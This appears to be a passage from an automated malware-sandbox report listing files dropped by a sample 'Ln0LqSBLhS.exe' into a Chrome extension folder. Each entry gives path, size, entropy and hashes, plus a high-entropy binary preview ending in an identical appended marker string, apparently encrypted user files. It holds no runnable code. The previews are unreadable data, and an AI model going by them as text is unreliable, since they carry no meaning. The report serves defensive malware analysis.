                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.460416248759068
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:+HjfHOcC+nsvIdA+gcWOu0nQIX7GXcii9a:+D/OUnjdEcW/0HcbD
                                                                                                                                                                                                    MD5:14EDFFADE1EED8BD842B849BE762A729
                                                                                                                                                                                                    SHA1:51517DC3C1A7B137DE08B29C5F9EA66CA2AB68EC
                                                                                                                                                                                                    SHA-256:7F410DDDCBEA25B46AA934ED296C029B10919B66CB4E56B0293528C24500703A
                                                                                                                                                                                                    SHA-512:0993077AEAE56402780BB69B046C08FDE4221A927557D451CAC4BFB23ABE8256DDF7411852831E579649F20DF7F2DBF270218FB372288E9A0DD8C9B9FC2AF1DB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......q.\OgxP....7C..|j...g..H.(..C..Z..".S..&:.M......@[qN...x}.......C,i.......Z|..1d...i-..`_..'..^W.)];...S.a2dh.^.4D.Fm....H.,LV.[.CH.+Wv..^......'/.=..fP.|.......C..F.......]...N.....U.A.jd..4k.\...."X.......Q..,?...@...........vh.4H.L....g.f..m2.M.Y..TQ..t{%.,....}p.W.h.x.....~.i...~7.....!.n...&.......=_.&ojg...0&r.X.\.......&j...o..tg....WkB82.`.D..C..pa...xA.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\pt_PT\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):469
                                                                                                                                                                                                    Entropy (8bit):7.476537424484121
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:7FtVuRRknNwzt6np8h8z+IaAxUTQst9ZY6phwcii9a:BtVuRMfnp8PIa66zrGbD
                                                                                                                                                                                                    MD5:BE1A1E2FCC3BE68F0309DD17893AFC5E
                                                                                                                                                                                                    SHA1:E7716B6B6256950E0923B9117A9E18273E37D447
                                                                                                                                                                                                    SHA-256:4FE66492759746B73EF96B806FB27739E04BC8F3DB727B874BCAF848E4BC029A
                                                                                                                                                                                                    SHA-512:CB4638ED039E57E2874A80D372EDDD9AA78DCB41F3AEF3135951E884C5E40611CD9EBA10C5995CB166982C1255C23978A6A2071150D0CDD7D8947A654B4DA869
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .3<.&.7...~^..R.N..Uy..V...m. I.5".#....)._."}V...Y.....W.....pu..PfxNZ....6.y....~.-U..P..v....7D....U........Yf..o...Ct...V...p...8@.9..r..!...=...u......?".o.%]5.r.;>/*O....l...V?x.`F.N....j.)N.#-v.[t...!0]..n..&7.........L......a.K.o. ..N1`.i.l7q......Y(."...l.......P......U..,.%M....#>...n.{V<...hw(.j.|...<..r....p....3.2..e.p.b...)rB.\.?6A...l..T..x..{,..Dg..J.....v.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ro\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.423965586980727
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:kzfVDERl9fqRKqgG1Qf3HWMN9DVoXSkTjCUUcii9a:0fVDExfqRKqF+f3HWMN9DCCkTj1UbD
                                                                                                                                                                                                    MD5:D889687C9039C826B51A7958E0956946
                                                                                                                                                                                                    SHA1:156EDB26C5FFA691DDF5920DBAA252C60399B752
                                                                                                                                                                                                    SHA-256:138D77E2B1B304DAC873DDE60388CBB9D2A0C247494793355503DFB7816F18B8
                                                                                                                                                                                                    SHA-512:3ADF10EBC8B94FA0358AA90BB99AE34DC5E657479E91C2F797DB098576E6BC948C1131BFC826D9A5ED9A576BB78D3559AFC58E02345CAA0452CFC4539AC4E9CD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...z..7.....'0..M..^k...#..w$hF.T=....1.BA.<.am.;6.^...2`....m..#......F)....b.{T1ArtA..{>.`5..9..u..5.e.9^...nM...X.(e.+.....%.. X...sK.G./...YC3..../..-....3.G3...QOf:..8...i.....tu'.G$.|..8..@`.(<].;.R. ]]..^n.#....C(`....w.I.q3N%.._m.N~......5.Z..o.EI.dl..l.Q...|......L.fk."V.y.yM......(...#.f.ds..M.p......4t>.s..(...'.(......xs.....^.7.D.......Z9..W.wh..k}..R.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ru\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):518
                                                                                                                                                                                                    Entropy (8bit):7.550646486312717
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:CtEKpxMWrRjfbaAy6UHcwy0QzMtTW5E0GAt8cii9a:CAKjf0Hc+B56ea8bD
                                                                                                                                                                                                    MD5:C881E5E6CDD1C8D04D027D1D52E8EC2D
                                                                                                                                                                                                    SHA1:5DA8C95479D63E3489B764C5AC51912BD43289B8
                                                                                                                                                                                                    SHA-256:E28A9C32C379311D85555D582463578D28FF0D64B29CFED4602934F3F1613565
                                                                                                                                                                                                    SHA-512:F8833F912CA87CFC1957765BB1F3A73380F75D655318FF07682BF3FA463EE1A9B9182D2C4F0C9346B4718F47CAA7F420E011D3F4B7725588EB92D34713E9062D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: I..1.{[wQ(._}B...<......MGf.....m}}I.....ND.@Z%>?k..k.B#C.b.p.zX.....%wP...,.b?....I..Fm.[.Bjq/.6....5QO,.qu....S...3....p...$,.../.S [@...&.F......l.....~.K.1Y..oL.u.D.iD.Pn....{.bbm._....f...m.I..t..78f .g..4t.v...<#..@V...T.e,.d..m..*c.e...N.$.......nG..J@e.8.b..N.P...W..5.m&.....u,...,)7.bt..)....b.j..'.K._!.......p.....:...../.($%z....%V&|......}n..%A.g48.h..'.M_!8.0..p.k.V.._.Wh...U....u..?........B.o7l~.K.`..i.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sk\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:Dyalog APL component file 64-bit level 1 journaled checksummed version 45.95
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):472
                                                                                                                                                                                                    Entropy (8bit):7.4193185272588735
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EuCWSOA2F0iWtsPTUABLBUG0RU5wrqrqbXcii9a:PCPQTUAB+GR72bXbD
                                                                                                                                                                                                    MD5:63AD236EA6A35B4C8308F25B8F1AF17E
                                                                                                                                                                                                    SHA1:7AD072EAE75055C96CDA291D480725F04887CE30
                                                                                                                                                                                                    SHA-256:39DF4B6B206EA7278CC085B58A65C5EF8A760683B5A0F963D348307BB87E4A86
                                                                                                                                                                                                    SHA-512:1C3DA814077536A743EE65998F38E12CD96544975703AA879C6B1F70B289E8F6107ACE7B9BCBC6D64FBC9608DB8E1885706D18580DC113B236C08DCB1C915827
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..-_.....$.g.....[.w......Y...?.Ic....4...e..F.\...b~. e$.m..+..8e9..`..w.|.b.".p.B......K.D.Lk.w.G..;qP..9...6!.A)/.C.(L...}*Z..s..iSL.z.!.=.;x.W.{e..~[.....K......SP].k..'...{.&.w.6...#r...<.H..d.zX...Mu4`.O'8.\.....&.qP.i..z5+D.pb......>-....NW...%6.. ..#%.t...,.8.{......y..8...BD..1?.n..w.~.|..N...$]..u....UZu..D{.4....I.m....m......U....R\..w.....a.....K.1*.O..H~..S.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):469
                                                                                                                                                                                                    Entropy (8bit):7.472819226617122
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:8+LlNXKX7uSe2jCmhZ8AcxmW/dTTyaEfoyO5BGIoHEvQxUcii9a:/eX7G2OSImAdaayoyO5B0E4xUbD
                                                                                                                                                                                                    MD5:A3F0ADE91364B3033796016B89F80D07
                                                                                                                                                                                                    SHA1:52BF38D65566769396FFE22699A3256CCBDA1DAF
                                                                                                                                                                                                    SHA-256:9930CEF3045FAF93BFBA3CDBBBB858C4083839B256069E48A5F122A6F25935D7
                                                                                                                                                                                                    SHA-512:6121C1F4D019AC6694669F5B3A6B5C6BB65774C3D6782BD6E629E9F1EDC9B761957D7B409381C33282ADFE0B5C846ED2F3B16FA00BD72B5F6E7FE4CB2B879594
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: w..N............D#.....$.....UV.n.8..'..q.M.....a.y.....x.Z0......W..|.:..J.....k~.?.).fD.T...h.lM.IU...&.s..7...+M.RL&..4....s.?..(.%.WI.._).K.f.#..^t....j..gg....$..sD.@..J.F.a.k.'..8.Y.&.c..../..~....2.O).O...G,..)+.`....[.._9J....$..DG.+.;.b...%G...n&.6Dgh,..d+.".E...zc..L1.;....J...C.D..{....j.".y.....R.`].f..E...'..kb.......:..#T._!..w!'Y.Z%..:...K.Hg!.....D. .5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):528
                                                                                                                                                                                                    Entropy (8bit):7.54811597960793
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:L81XMlhIkcLFAYFRYI5ETY4IfTyWIoPGk4ag58atRh+5zaXcii9a:o2gLFH/vIoPGXas25mXbD
                                                                                                                                                                                                    MD5:5EF5203F04909537E02616209DA423A4
                                                                                                                                                                                                    SHA1:B3F58FB6827EFA39A1D65ED2711DCDC20FA905EF
                                                                                                                                                                                                    SHA-256:B7CE4B1EF3093E19A30787E598E2C5B035B9ED80FDBD9A2EE1451F5CC4E2E1C2
                                                                                                                                                                                                    SHA-512:18B5A96EC65FEB8F24375768DB765042CA1DFB9DB08599E3B501279FDC6EDE5CACA70FD47B727A9E1D6400C6B5AD49F9910BA66046ECF5ED132F860401CA5BA1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...o...^...p.[...|....qA..[:.WW..7e<...~.C..~._D.>.ZL..pT/...hB.......@-.o..N.<.8.b.yf...e..l....7......=K........t&u!...3yz..(Hm]..w..n.....o.........d..T..E....*.\K.......H......s.]'.{..'?.|~..:......BtlkE.!......yp....YAmJ_.C.n\.Z.H~.....A.9.A....3Mj..#.../."...r...T.$H....W..dN...7.6@..R.X..#-N]..E..aa."&...Y.!....\r.+w..8..".u<..C..W.%..z.4...*..e*...\..A..U.....Q..JK^n.j.....%oi.........!......a6..Z......OS...D.*.V8J5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):471
                                                                                                                                                                                                    Entropy (8bit):7.465478674760522
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:PdbYYWAtcPkud9PQVTA8UCBZhv/uzFiXcii9a:BYYWgcMK9d8UeXHuKbD
                                                                                                                                                                                                    MD5:593B2098E41CF932914D3D8CA49F0B24
                                                                                                                                                                                                    SHA1:175DF3CF7F673932BC5327B2EACA098D6E19B1B4
                                                                                                                                                                                                    SHA-256:7F95420D7B301CC6054176444F4144D6BCE59C70C995FA715BB4156A0555C60C
                                                                                                                                                                                                    SHA-512:8117EBBD0D3EDE27DD54471B4DBC82F1F8674252A43B2FCACC533D20B763BC1409C80E9C45EA48F796A08D91A540F5E0FC60D1474BDEFBC25492299A7159FA90
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: f.@..g.p#...Q\..[...X....)|.|..'.j..JH.T.>v...F...u.j:.Q......x/...|.".3Z....;..;....e....8...,..]{.Z..I`...N..zE.A.....d..+......=ez;.u...hk...I...&..`>S.*..t...Y.,....u&g.{...{_.8....].....+...V.X........\....c.iyh.P+..2...}8\7.lPg....`.....uk....DK;..nl.C.W... .P..`.........s..x.j..O...:P...0m....Ia<\......?.-..Q.5<............x....'.N....6.{j.E.k...p0q..]. `...^|.....w$5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):505
                                                                                                                                                                                                    Entropy (8bit):7.5207987748521266
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:T0yQIc6secHt49LrH4qTDvCtIG/4cdJusKcii9a:/s6rlrH/vCtlnJjKbD
                                                                                                                                                                                                    MD5:25FCFDBEBE6D0ABFB757424365651885
                                                                                                                                                                                                    SHA1:909E27CA88D9B48594459ACA5A0B1D846CE61E99
                                                                                                                                                                                                    SHA-256:9B0C9B61DD3D29105FDE23AF2F149BF919D8871E48C6F9AF2C03937A74912A35
                                                                                                                                                                                                    SHA-512:9FEF90BFD983070AE78476F6C26B15648BFCC2DA5D183848D78397BFBFFE2D62D7011DE28DD29AE9A6F24AF37C897CD32758922B7F2495C192EC18A8B2B995D8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..>...T...f..xM.6w?..s..W<X.....hy..W!Q.l...@....H.i.E"...4...Y..V.B.._...v.5+P........."/.&...pR.U(....)|...e..LP... ..U.-.$..mG.Y..-......I9Jc..3...j.4.o^.l4..$.9.6.|.+..M...l#.f..8.../.....]w.6........m.eSq..M._.B..../u..p.....DYs.6q.......U....OCj.lDe;..dy....^.%#.....5..<#....'n..@..~?....[L.L.........#..q.....<QmS`...N!.....)&..J.N.DE....&.y.,9.AU".W .6.(>....BK.r#..Ui..J.@..f......>".t.L#|5..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):465
                                                                                                                                                                                                    Entropy (8bit):7.455715395818472
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:R7AvUI+ox0uDr5nl/meXRC/Cm8DNyZ5+nX6dpHwbvgtPLJNUaf7gzNGYfW2A0i7S:9CdPxNruoAOu5Y4wbYtEs7I/7fXcii9a
                                                                                                                                                                                                    MD5:4593DDA6FBE93B442F83F6BF7DC79DFB
                                                                                                                                                                                                    SHA1:A9677E59987120E17006F22BAF7F37A2BCB18FC7
                                                                                                                                                                                                    SHA-256:1DE75DC15F49F5C3A158726255405D234B229B84CB06C9A1A5AAEEA1570951C3
                                                                                                                                                                                                    SHA-512:4ED1332DB3D868BFBEDEE329FEED3F5BA4DB659F2166095DBCA96D59A9DEA5EC2629E6630F1016FD8596981E5C7D5BAB386F6D1466D0F25EF6633057542501FB
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .5S.L.m.R.>o..:.....%..Y*........hJ./>M.!}.Z.p.&*.*=..._|..G....d..a..S....2v.k....._o.R....{.e..@...j.GI..9..Y.~xe...+.p..1...2....6*u:<.lJ.J.O..|..~"...I.h.\Hj.........F.2..4.W.2....J?.bx.9.2..1C. .Y4y..5.S..o..u........G"..O.....X]._.@...h.IZx.O3X.....#W%...v....L\....nk...{7...D._Y....+..H..:...4}?#....p..]O...t.....Y..._......q.F.....a./.lF..3...d.-Zh.2.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):513
                                                                                                                                                                                                    Entropy (8bit):7.496980916498331
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:11bS+euRyrLMfE8/XMb8fFHcus5R4/FVPIWbYcii9a:112+tkM880b0Ds5R4zqbD
                                                                                                                                                                                                    MD5:5C07421C34EBC3A241FB3C021C046E81
                                                                                                                                                                                                    SHA1:5C183B849576C6EA17ED57D333B250705F8C05B8
                                                                                                                                                                                                    SHA-256:920D4F74249742FE18C9AEE6EB21B325BDC50BE6ED095B573EBBA61ED1A0E5E9
                                                                                                                                                                                                    SHA-512:9B528BC481E111772F147E16B0A6138931A08A5031F96D1078ED826E944760733D2E499891142A8ABCE23B583058B3A5C6AACA80235322DCBB0A90EE13D7FBEE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...;..=.......r......$......vY2..w -wc`..-.z6.T....G.9..D..7<...s......XL...G..T.;'.A.L..r...BW^....8.>.....$.f.........0^.l.,(.._.,O.5.m~....HS...b.F...!..B.....L.wN..........C.......w.q...<.<...?...J...nH..v..m....a...+.#..Y<.RIQ.S.$.z.i=...a..r..K8xT).(.j..$'dVz..13.?.yid$..q.H.N&Ddp....._..j1....d...-Le.....[...wz.W....S.WU..a..q...+2..l.."...()..m/3....p.**.s...W-..w.y..:.Yo!.....r}..n..wb......j,.a.H.?M..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):482
                                                                                                                                                                                                    Entropy (8bit):7.526156890650377
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EX+8b99Xy33s0O2CxDIy355OBHmcvyky1CNQ3ULcii9a:EX5bfXEs0MxkypkO1CNQCbD
                                                                                                                                                                                                    MD5:75AFA18864833BAAF88FBAF3054864F1
                                                                                                                                                                                                    SHA1:8B64CBFDD5E4A57599210BB411303688942E079C
                                                                                                                                                                                                    SHA-256:5C48C981511A3C07CDB6B98A46E873DB75523A02CDBA3802713285913A832B81
                                                                                                                                                                                                    SHA-512:8E19F7F0B6E6E5C3F81360D2F976F98C1DDAC67EA314FC617E44C900059995551F0DE04A863269541C0B33169C12309F45587D2B315376FD5FF9DB0FDE723903
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: !V.njW.7Jm.g.?i.{.V1y...!..^...;R.O...f.S..(....B..@E.N...esE+.9..;.?i.%!....#)+...b..*...Sx....c.YA....E.xZ....M...P....@...A...}.........=.!Vf......l......T3...k....q..+.).U.<..|.....]n.V....5o."..zx....Op/J.U.D..}..d......@...O..R..j[Yv.....z..,...b=NX.O%#ni........n0.B....2..pA.}....H.......!y....8....&..s..Y..|.[z.v...-.R..T0.Vt.)...!. ...........)...\...G1..,..L.W....*..0o..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):460
                                                                                                                                                                                                    Entropy (8bit):7.383763204891125
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:BBQnHZ5R82QEMznQ74kPEw3/omDB0YGfkxcVkcii9a:BBQ5DR6aBvVaYGOc6bD
                                                                                                                                                                                                    MD5:85FC9453876EB0F4AD778D92A9EA61B4
                                                                                                                                                                                                    SHA1:8DFF4E60689561E0A25288D121474B2E2B8C2FB0
                                                                                                                                                                                                    SHA-256:7BCA225FEC993207FEA24A2FBECA1471DF30D7CB2A29F3C30BE49709184BC12D
                                                                                                                                                                                                    SHA-512:A45EDA3333760D248BF1A298F80120A7846429FCC5E35D18A97FC9D5345E6FFA33D4148AC82BC236F96EC147128147E6D6A3AE89FC3938EB6ADC3463790D37A1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: i....v.n.b.E.(|v.g..jxh..A.........$.Q\&..x.Z.......<.9...!..g...+..Wi....m7..^.Q.>'.X%..>....z..[w..._.....r(Ad.....,5..z.H..D...f3....+t..x..=?$q.`.w.n..oox.#X8.X....3T.+..wYp...y*...CFDj,$;.q67.#wc..[&._y..g.j.=.I5...-<.fC..\.OP....gpU.M) ...x8...t9...D...o._6G...;.F+...1.C.(K..<..n.X...!Y....qW..D.Vf.{..J..xWq...[C.*.#q..Q...j#...o.n$.l..3..+.L...).....8....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):451
                                                                                                                                                                                                    Entropy (8bit):7.448566080368515
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:t78u6NfpiB0kgLUIPaKDJMQr8r2y+2s67cii9a:tYfpiBvRIFKn2y+Z67bD
                                                                                                                                                                                                    MD5:D30DC10987C3E0490505BF30547E0A08
                                                                                                                                                                                                    SHA1:5C89EA0A7007138FAA808E98A302E8132F6E11CB
                                                                                                                                                                                                    SHA-256:BFA8ED8783F5956DB26326D5CB71D3B60ABB1A82EF2455E2440B816552B1DE83
                                                                                                                                                                                                    SHA-512:B8B5E4FE4CDD8E3F5AAB5D57B6FDAF08CC9FA5D434CFF5C3A130D4B611FF895D008A5DB1C48C001307FD8476EFE204A191AC4E42AD28FDDA7CAFA716E261029D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: g...I...K8.........|.rE....>9...'(SFD....r......*^X.!.....9(..[w.{I.....4b-..N.C*|.;..yo..Mj..9..q!... ..8.2.1..B...(......dy..-..U.LT..^\..d..k.P..d4..A.}...M}.......;>....i...Z.*.......#...1.Q\l.&....><P/.j.(..c...y..F.8..........~.......x2........n...c-..._.s-...A.?WO..2..g9.R.O...F......y......N......F..!..',.....Y..\l.i..$.H@Y....Cf6.RI..!.W...J;.R....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):681
                                                                                                                                                                                                    Entropy (8bit):7.597586229743472
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:TI1KXZ3pb5tQrjU/+s972rEBAaM3YEIXu/Zgi93B4Z9uv8qoapoqPHfqElddYfcr:4Kb5tQH3s9F/M3DI+d3BK9ukV2Zrlddz
                                                                                                                                                                                                    MD5:D1CF665B28DDC0D6959DAD38881217D0
                                                                                                                                                                                                    SHA1:F84E89FC21639EF69E1E642442945AFF9780F8EE
                                                                                                                                                                                                    SHA-256:F92245FB8D3CE64B6AECEF34B07F691F7B57F3B9C12DFB3D386356DBDF4C06DE
                                                                                                                                                                                                    SHA-512:4205AE74182C16782E8C0CC6C1B5B7114B0EB33B0E6AFE032BF3EAD0B085B26BE4883832C78890B35944FB72919EB3F6BE6FF335A2D9B3FF3BB7E62BDFC705FA
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...+G;..Ia.....g.z.e.n..#....yo...A_d..>..0.I...:...(.....@'Ap&...V.oP....)*i.q...u.*.Mf.b.-;..5/g..#/.....1Y..M.|*?........!....^#O1L\..8.Cq6^bP..'......~.y...c}.<...9..s..r.^&..1....5.....f...).#x\...._`]f.w.9l.^)..^...O2......=.w..B.B.F..~.....WV?.`........\A.Z............(z.(.-.<a<....|t..(..."..'..../..Y.c..\........;..1.....8I..^...@.1R.Fz...>Y.......O.C..%.m.....1A...+y.......@..2..].4.`M/.!..w.E..w....1,]...9.c...^..m..`.fr>.5I@.fN..\..do.(...r.t.%.V#...<.g.Bq....k.sI...mrdE'4].6...[.y..}x.>.4.&Bk3...S..C....8[..OmL..9<.R.K.....@~0P.ax5...R#@p>.i.....F..e.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):7239
                                                                                                                                                                                                    Entropy (8bit):7.976821022060424
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:u2++RcE+6cQgGMSKfIR0JC/BsgZgJrcyPt+s1asB:urM3lcQgGCIKMPm1cIxB
                                                                                                                                                                                                    MD5:6983F22557C807D7F40AB0EAB19AC133
